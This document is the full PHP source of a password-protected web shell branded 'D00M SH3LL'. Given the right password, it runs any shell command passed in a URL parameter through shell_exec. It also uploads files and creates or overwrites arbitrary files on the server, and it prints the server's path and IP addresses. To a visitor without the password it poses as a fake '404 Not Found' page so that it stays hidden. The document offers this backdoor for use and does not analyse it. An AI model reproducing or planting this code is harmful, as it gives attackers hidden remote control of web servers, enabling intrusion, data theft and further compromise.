$ps = 'b4f945433ea4c369c12741f62a23ccc0'; /*Md5 Pa33w0Rd*/

$pas = $_GET['pass'];

if (md5($pas) == $ps){

echo "<!DOCTYPE html><html lang='en'>


!~ D00M SH3LL ~! <title>!~ D00M SH3LL ~!</title>



<body bgcolor='black'>



<img src=https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQIu9cck57nf706xFWXdYCib_PqD1jIb8PKbg&usqp=CAU>



<font color='RED' size='5'>[×] D00M SH3LL [×]</font>





<font color='RED' size='3'>[+] Path : ".__FILE__. "</font>
<font color='RED' size='3'>[+] Server IP : " .$_SERVER['SERVER_ADDR']. " & Your IP : " .$_SERVER['REMOTE_ADDR']."</font>


";

if ($_GET['sub'] == 'sub'){

$cmd = shell_exec($_GET['cum']);

echo "



<font color='RED' size='4'>OUT : ".$cmd. "</font>

";

}
if ($_POST['sub'] == 'upload'){

$nf = $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $nf);

echo "



<font color='RED' size='4'> Uploaded : " .$nf."</font>

";

}

if ($_POST['send'] == 'send'){

$file = fopen($_POST['nm'], 'w');

fwrite($file, $_POST['tx']);

fclose($file);

echo "



<font color='RED' size='4'> Done</font>

";

}

echo "












<font color='RED' size='4'>Comment execute</font>




<input name='cum' type='text' id='cum'>

<input name='pass' type='hidden' id='pass' value=".$pas.">

<input name='sub' type='submit' id='sub' value=sub>







<font color='RED' size='4'>File upload</font>




<input type='file' name='file' id='file'>

<input type='submit' name='sub' value=upload>








<font color='RED' size='4'>Create or edit file</font>




<input type='text' name='nm' id='nm' value='File name'>

<input type='text' name='tx' id='tx' value='Text'>

<input type='submit' name='send' value=send>





";

}

else{

echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">





404 Not Found<title>404 Not Found</title>





Not Found



<p>The requested URL was not found on this server.</p>

<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>



';

}